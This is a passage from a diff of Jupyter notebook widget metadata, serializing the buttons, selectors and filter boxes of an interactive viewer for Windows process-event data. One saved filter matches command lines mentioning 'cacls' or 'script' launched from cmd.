+        "TargetLogonId",
+        "SourceComputerId",
+        "TimeCreatedUtc"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_35ed7a6a2aae4f8bb322a916730e04d5",
+       "style": "IPY_MODEL_28e2f8aecc1a42f6b2be8c80e32b5450"
+      }
+     },
+     "9171d21e033246759ada6b96efad2770": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Update filter",
+       "layout": "IPY_MODEL_240c8efe2304410fbf00fab36dacaa92",
+       "style": "IPY_MODEL_11bad756849940df861619ee57f54ae8"
+      }
+     },
+     "91c4521dd87b4611b0327231aeb56283": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add filter",
+       "layout": "IPY_MODEL_a190c47ab76d4e8095aca04aade6e5b9",
+       "style": "IPY_MODEL_28d31e801c624bac96c38ebdc8bde877"
+      }
+     },
+     "91f88d6ddbd149f4911b712252262582": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "924757853d714e4d9379bf5ea0401e62": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply filter",
+       "layout": "IPY_MODEL_9ff12de9bb254724947e57bcac8aacbe",
+       "style": "IPY_MODEL_6ec04674a0df4341a4b6a4304b7d9a43"
+      }
+     },
+     "926d144e06b24698bb51b8c51f18ac27": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "92d6d1021cab4afc82932377c5826a57": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9414237db4a44f64833c7e9743a5d522": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "not",
+       "disabled": false,
+       "layout": "IPY_MODEL_babe30d69e034ef0af9907430bf4c716",
+       "style": "IPY_MODEL_66d7edd125c144388025e41cab4aa0ac",
+       "value": false
+      }
+     },
+     "9578b90f719547f0b4c11b238202c9cc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "95b2e82b11184bc9abb7d59331f60b18": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "95c7078cbbc14e81800c9beaca07ab61": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_dcc07290f17244e1b2f7167f2ec5b403",
+       "style": "IPY_MODEL_317f3cbab9a04ec4ba020f7d842c08ff",
+       "value": "Current filters"
+      }
+     },
+     "95d79867267445e1810542e2538a7a89": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "97a4e6e8b84e4da4b43cf9888aad5c47": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "983445971b1748fa8e34c852d9c0ff1e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "99c0dafd7b9d497bb9f1fd7395417065": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "99e3ed316f0c4801bbebdbcd7e5e9eea": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Update filter",
+       "layout": "IPY_MODEL_95b2e82b11184bc9abb7d59331f60b18",
+       "style": "IPY_MODEL_9f7cda5fec354ecc96e07b837f7386c9"
+      }
+     },
+     "99ed9f340e444401a3934a1451bb3171": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_7c0d2a8d8afe4197af41c37b702ea1f4",
+        "IPY_MODEL_0b1aad3a831b4a57ab9463d831a3c630"
+       ],
+       "layout": "IPY_MODEL_0b5205cdc4a14e4bba53cd6c04d3bf17"
+      }
+     },
+     "9a8a82586b6e41ab87cce717b8330065": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9ac351b5363b475496c518e770afbce3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9b49bd4fde5f4b15a5b42e1b3c69f462": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "80%"
+      }
+     },
+     "9c4d084fb7a74bb3bc7fdf8dccc7e7d1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9c9fcc10bd104f4393f868e08dd758f5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9d1e3519a8aa40f8afc5253b143f1cfc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3e5bf9dfbc5e403fbc1f598a84461202",
+        "IPY_MODEL_c8070c6701244ca0bbc0bdfd2c8277c5"
+       ],
+       "layout": "IPY_MODEL_123640ba0cea4f9da968315244f625be"
+      }
+     },
+     "9d5c7d739a3a469a85328effd2798798": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "9d64ba523a704ed49b41651fde3f2148": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_0c442da2b2b94765ba2116badd5ed9a3",
+        "IPY_MODEL_04ff5b81dc504d3b98f6e052da918363"
+       ],
+       "layout": "IPY_MODEL_1754cc6735a642c99c80ea50b3f23387"
+      }
+     },
+     "9dff4a1c556a4a0483e3f1be59d6abd1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_dafe89f0ccf54e93a4e27e79cdbbb91d",
+        "IPY_MODEL_c50401bf861d45169f598225e2d9eb95"
+       ],
+       "layout": "IPY_MODEL_b07f713cf9b54136a67d0dffa7578108"
+      }
+     },
+     "9f6748ce9fe141aca528ace24ba67cf7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9f7cda5fec354ecc96e07b837f7386c9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "9f7ea662245444379365dcd2ba059448": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "9ff12de9bb254724947e57bcac8aacbe": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a190c47ab76d4e8095aca04aade6e5b9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a1d3217416bd48da9476d264384ba3e9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "a1ed7400c5e44de38efb3d26c89a560f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a2042295c9d24d27acfc9fe059cdeaa2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_0f78cf60c57442c7962936dc5129fb1f",
+        "IPY_MODEL_49ec7cbca6094ec6bd95b9d8fc475e19"
+       ],
+       "layout": "IPY_MODEL_8ec127f5d9d74f068c9ce0043bc6f7c6"
+      }
+     },
+     "a2111a9ba8b346f9a740669cf247d8e2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_5dc40bae85f843089ee9cd9c23ba55a1",
+        "IPY_MODEL_d0c335b6bcab46379fda2071644ecc0b"
+       ],
+       "layout": "IPY_MODEL_a98d3278641141ba87cb427ed9696a69"
+      }
+     },
+     "a4020984642c425391bd29b2819271f2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Choose columns",
+        "1": "Filter data"
+       },
+       "children": [
+        "IPY_MODEL_e13ff8b78c1a4f1a86cf3efd44926cce",
+        "IPY_MODEL_1f53b3b0af94423f8d1e6e651d13a739"
+       ],
+       "layout": "IPY_MODEL_5d1d50dcb2994f94b1f68091db52194b"
+      }
+     },
+     "a453fb04433d445c8a906b6b5b86093f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a46f22e56f3844f2aef67775f82bf700": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a479941a224240568cf7ab9faac9bcaa": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a49736614c4842248677b03304d4b3c0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply filter",
+       "layout": "IPY_MODEL_8f2dabeba3214a06916d46d79a842633",
+       "style": "IPY_MODEL_a1d3217416bd48da9476d264384ba3e9"
+      }
+     },
+     "a49ece9f71ee4341876903064f3561ee": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "a4db3fb217db4ee099ade4ec11dc5f91": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "a538297768214e9882732aa71ff00b2a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4732461066364353bdec58f67246ac2b",
+        "IPY_MODEL_9171d21e033246759ada6b96efad2770"
+       ],
+       "layout": "IPY_MODEL_d623624498624e0c811372505b9ea306"
+      }
+     },
+     "a5ac138657f44d96b86f90336f041a1e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a5cb991221db44d1986972f4758bd486": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Clear all filters",
+       "layout": "IPY_MODEL_876360ec6f7a40f29e2ddddb7499edfa",
+       "style": "IPY_MODEL_df18f2d18ec343158193cebc8f77b2ca"
+      }
+     },
+     "a67b7cf6035d467184274b9aa4ccfea2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Choose columns",
+        "1": "Filter data"
+       },
+       "children": [
+        "IPY_MODEL_67fe3434a66d4846b4aa6f8e77545022",
+        "IPY_MODEL_3d5cd18b3c704bd5af5b7d7e5fe8c8ef"
+       ],
+       "layout": "IPY_MODEL_35e743cbf37540cf82454eff5130d346",
+       "selected_index": null
+      }
+     },
+     "a7dcffbaa4414c7fa5e011de31701511": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "a9093fa6558d4ded9d1dbd81d012564d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_196f6de2919a488d885de432efd68bff",
+        "IPY_MODEL_2045bb0b47b740679b00453bbb43fe43"
+       ],
+       "layout": "IPY_MODEL_3b625d23c1724ba9ad2fca444ae41557"
+      }
+     },
+     "a98d3278641141ba87cb427ed9696a69": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "aa02500b929b4d7180ec69a7cf20d591": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "60px"
+      }
+     },
+     "aa538012bac8400d9af8fc9139f334e8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d81645b362234e3f9128e78f10c600f8",
+        "IPY_MODEL_d738b25d84fd4c3199fe462da739f0d9",
+        "IPY_MODEL_37423026a07c47bcab9fb40a998ce6e3",
+        "IPY_MODEL_29818462d318453e942833765601e387"
+       ],
+       "layout": "IPY_MODEL_6505786c126f496188cabc0e0cc7fbd1"
+      }
+     },
+     "ab22d75a7f3b42b8a4a778225fa2fb9d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply columns",
+       "layout": "IPY_MODEL_e62e7f1a080640fd90e2fb1471583396",
+       "style": "IPY_MODEL_379a69de1e8c403a9b4245e01a504291"
+      }
+     },
+     "ac7accb7fbcd45aaa1387d8548373abd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ad3662e275b14795b7a09ffecdf1b070": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Clear all filters",
+       "layout": "IPY_MODEL_15262870d1d84a4c9b31e8807e84e02e",
+       "style": "IPY_MODEL_01ceaecf10814b35a94144766cb7ca53"
+      }
+     },
+     "ae04095cbbcb4aecae07f913cd96b8ef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ae90356d18304d3db37a05ffb571255c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "af35fa80fed04119bfab11dfaceb30e5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "af4f3a82204b425eaff3b8ae8f022c5c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b06563bf165b41d3ad44fd83ca53cb6a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b07f713cf9b54136a67d0dffa7578108": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b098189c53c8460e9a9666d5752d92ef": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_fc24f008595e4a16830989b86d128b23",
+        "IPY_MODEL_41a49335edb540afb5788bafc4b12ee8"
+       ],
+       "layout": "IPY_MODEL_a46f22e56f3844f2aef67775f82bf700"
+      }
+     },
+     "b11eb634e0f4465baefb803f65deb815": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b19d18abf4ad4f8c82d1ad7ce752d3ec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessName",
+        "ParentProcessName",
+        "TimeGenerated"
+       ],
+       "description": "Selected: ",
+       "index": [],
+       "layout": "IPY_MODEL_f4f60fc719914eacb9755d5f34d6e6e8",
+       "rows": 5,
+       "style": "IPY_MODEL_1de3a3299e984809933af7b33deca16d"
+      }
+     },
+     "b1ac544d401348f79719d22c32c26a1d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b20c9970a8e948678ca47947e7aaf675": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b22abd90c5ea4903b6cc5d3d2a84d802": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_2226ad09a3aa41d88d09d86d778a4e33",
+        "IPY_MODEL_e60df3b80f6746369ec6051d19a3a3b6"
+       ],
+       "layout": "IPY_MODEL_4da850c8e7b749f8b99cfc8a9f744214"
+      }
+     },
+     "b31376a38ee6457b89cc140165c1623f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b331bba272ed438aa05e46dddfea7cdb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "b3910b3aa2ef40fba7b43d0cb4ab9d13": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b3b63660a07b4c618485f25aaded3a10": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "description": "Filter value",
+       "layout": "IPY_MODEL_18cced5f4a4e4e8c8be1b41f2dacef1c",
+       "style": "IPY_MODEL_4d5f608bec20449094d83db8a84f208b",
+       "value": "ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))"
+      }
+     },
+     "b572c2e3d2f94056b6260ceb71ad4dea": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b599739a1e6841428763723dd28c75fb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "b620d8158c6a4be4ae42c239258a8cbe": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "400px"
+      }
+     },
+     "b64198dc7a1d416b92e576c5ee7c2fd1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "b6b48710a238432db8fbc85f95d965c8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b880c4dfe80447058c66366612e7bd58": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "b9418b0a4b0f426e82d48c6d431c4b76": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "description": "Filter value",
+       "layout": "IPY_MODEL_8f89a185ca434b478f868052fbcf355b",
+       "style": "IPY_MODEL_b599739a1e6841428763723dd28c75fb"
+      }
+     },
+     "ba1fe5d2378e441fb5560721c2ad905d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c8f3d5852944446f8da439f8deb6c483",
+        "IPY_MODEL_53edfbdbf8094668887e7fa7aca1277d"
+       ],
+       "layout": "IPY_MODEL_32da2808f3dc48c780007097651ad199"
+      }
+     },
+     "ba9e467fd43a4f8a9fd1945b5b733982": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "babe30d69e034ef0af9907430bf4c716": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "60px"
+      }
+     },
+     "bcb693da74b04b08b12702d7192a1797": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "befe835037dc4d2c91e679f463aac44a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c0d47d4ba3094e7da48a68121f8bfbd9",
+        "IPY_MODEL_c5fcdf8ea5884d2a88dcad5a87416fd0",
+        "IPY_MODEL_b19d18abf4ad4f8c82d1ad7ce752d3ec"
+       ],
+       "layout": "IPY_MODEL_b11eb634e0f4465baefb803f65deb815"
+      }
+     },
+     "bf13fcf0577a4563999273f2becb1a40": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c0d47d4ba3094e7da48a68121f8bfbd9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Source: ",
+       "index": [],
+       "layout": "IPY_MODEL_f4f60fc719914eacb9755d5f34d6e6e8",
+       "rows": 5,
+       "style": "IPY_MODEL_870b77088ecd4f34b282b3999a797551"
+      }
+     },
+     "c1e8284393ce49e1b68064a05e0821ec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "c29e51193319449d81fadcf89b5bbfce": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d7786047e2dc4f309f2385f17fe32dc5",
+        "IPY_MODEL_eacebb41fb384c078fce1b8c377d0561"
+       ],
+       "layout": "IPY_MODEL_a5ac138657f44d96b86f90336f041a1e"
+      }
+     },
+     "c30b9753c9314d6e8601359f80c27b5a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "c3547c84759043b8aa461cb754754fd9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c36a852fa7dd4469bed195022bcedcba": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Choose columns",
+        "1": "Filter data"
+       },
+       "children": [
+        "IPY_MODEL_5e4a9ab5687b4c44b42eae3e5cd53193",
+        "IPY_MODEL_862dbc1d217e4445b93a96a17792661c"
+       ],
+       "layout": "IPY_MODEL_b880c4dfe80447058c66366612e7bd58",
+       "selected_index": 1
+      }
+     },
+     "c50401bf861d45169f598225e2d9eb95": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e8c3b59a99834acebaed0b8358616349",
+        "IPY_MODEL_492e6b74c6fb4883ac8e7f217427b0f2",
+        "IPY_MODEL_09c5521bc8ca478b8ca2930b32c2f6f3",
+        "IPY_MODEL_8603589afd034ef18837d15a44717d2a"
+       ],
+       "layout": "IPY_MODEL_ae04095cbbcb4aecae07f913cd96b8ef"
+      }
+     },
+     "c541a659ef5247de88274ce099e211cc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "c59f4b4b12ea405aaf0f455b95dcb4b2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c5fcdf8ea5884d2a88dcad5a87416fd0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f4275863d3aa4f599341acb67bb42d79",
+        "IPY_MODEL_86cd6f31f32949a6adc24e7e36fae932",
+        "IPY_MODEL_2e774ca4b671491f8b2c6815725d2197",
+        "IPY_MODEL_455a4f5afc00481cbda4e6749f52df45"
+       ],
+       "layout": "IPY_MODEL_ac7accb7fbcd45aaa1387d8548373abd"
+      }
+     },
+     "c637944b7f694ee3a2339c345f1fd0d2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "80%"
+      }
+     },
+     "c66f8bee2513480cb6bbf9ccd65813fa": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove",
+       "layout": "IPY_MODEL_926d144e06b24698bb51b8c51f18ac27",
+       "style": "IPY_MODEL_e6887207495342f687d796cfcfcf1cb5"
+      }
+     },
+     "c70f6096a87940608ecb1abad231842b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c8070c6701244ca0bbc0bdfd2c8277c5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f160ac28c4df4a638a9e14a72187d4cf",
+        "IPY_MODEL_a5cb991221db44d1986972f4758bd486"
+       ],
+       "layout": "IPY_MODEL_357904b77e634085ab873b108cec56e5"
+      }
+     },
+     "c8c388f3d0b84b93925baaef4499d14e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "80%"
+      }
+     },
+     "c8f3d5852944446f8da439f8deb6c483": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_dbe784888e5b4e259a64cf12deee896d",
+       "style": "IPY_MODEL_91f88d6ddbd149f4911b712252262582",
+       "value": "Enter multiple values separated by commas. Strings do not need quotes."
+      }
+     },
+     "c95fc31b16f740f7881c833b80dc0ff6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ca39f6e939634ea1b8ef11bf0bcba99c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ccde816cc3e24430892cc22423a2cc8c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "not",
+       "disabled": false,
+       "layout": "IPY_MODEL_3c8fd11bf6eb47bf935f8ad83ef84793",
+       "style": "IPY_MODEL_ec5e3915e70c4a9dab9c9d602736c51c",
+       "value": false
+      }
+     },
+     "cd0cbccc70804b6a95707356c1292568": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete filter",
